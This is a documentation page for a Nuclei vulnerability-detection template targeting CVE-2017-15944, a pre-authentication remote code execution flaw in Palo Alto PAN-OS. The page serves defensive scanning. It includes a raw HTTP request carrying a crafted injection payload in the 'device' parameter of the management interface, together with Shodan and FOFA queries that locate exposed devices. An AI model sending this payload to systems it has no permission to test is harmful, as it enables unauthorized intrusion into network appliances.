Skip to content
Nuclei Templates

Palo Alto Network PAN-OS - Remote Code Execution

ID: CVE-2017-15944

Severity: critical

Author: emadshanab,milo2012

Tags: cve2017,cve,kev,edb,rce,vpn,panos,globalprotect,paloaltonetworks

Description

Section titled “Description”

Palo Alto Network PAN-OS and Panorama before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface.

YAML Source

Section titled “YAML Source”
id: CVE-2017-15944


info:
  name: Palo Alto Network PAN-OS - Remote Code Execution
  author: emadshanab,milo2012
  severity: critical
  description: Palo Alto Network PAN-OS and Panorama before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Apply the latest security patches and updates provided by Palo Alto Networks.
  reference:
    - https://www.exploit-db.com/exploits/43342
    - https://security.paloaltonetworks.com/CVE-2017-15944
    - http://blog.orange.tw/2019/07/attacking-ssl-vpn-part-1-preauth-rce-on-palo-alto.html
    - https://nvd.nist.gov/vuln/detail/CVE-2017-15944
    - http://www.securitytracker.com/id/1040007
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2017-15944
    epss-score: 0.97314
    epss-percentile: 0.99875
    cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: paloaltonetworks
    product: pan-os
    shodan-query:
      - http.favicon.hash:"-631559155"
      - cpe:"cpe:2.3:o:paloaltonetworks:pan-os"
    fofa-query: icon_hash="-631559155"
  tags: cve2017,cve,kev,edb,rce,vpn,panos,globalprotect,paloaltonetworks


http:
  - raw:
      - |
        GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337"; HTTP/1.1
        Host: {{Hostname}}
        Cookie: PHPSESSID={{randstr}};


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "@start@Success@end@"


      - type: status
        status:
          - 200
# digest: 4b0a004830460221009f5ad49fee6591e6494df36c388abcaecf0fd830fa9f4d63b85e8236c5187101022100b2257f55fa8dcea9dc861b3fb9f07723d1ac00fd17e605fb37b9a53f703f3c79:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2017/CVE-2017-15944.yaml"

View on Github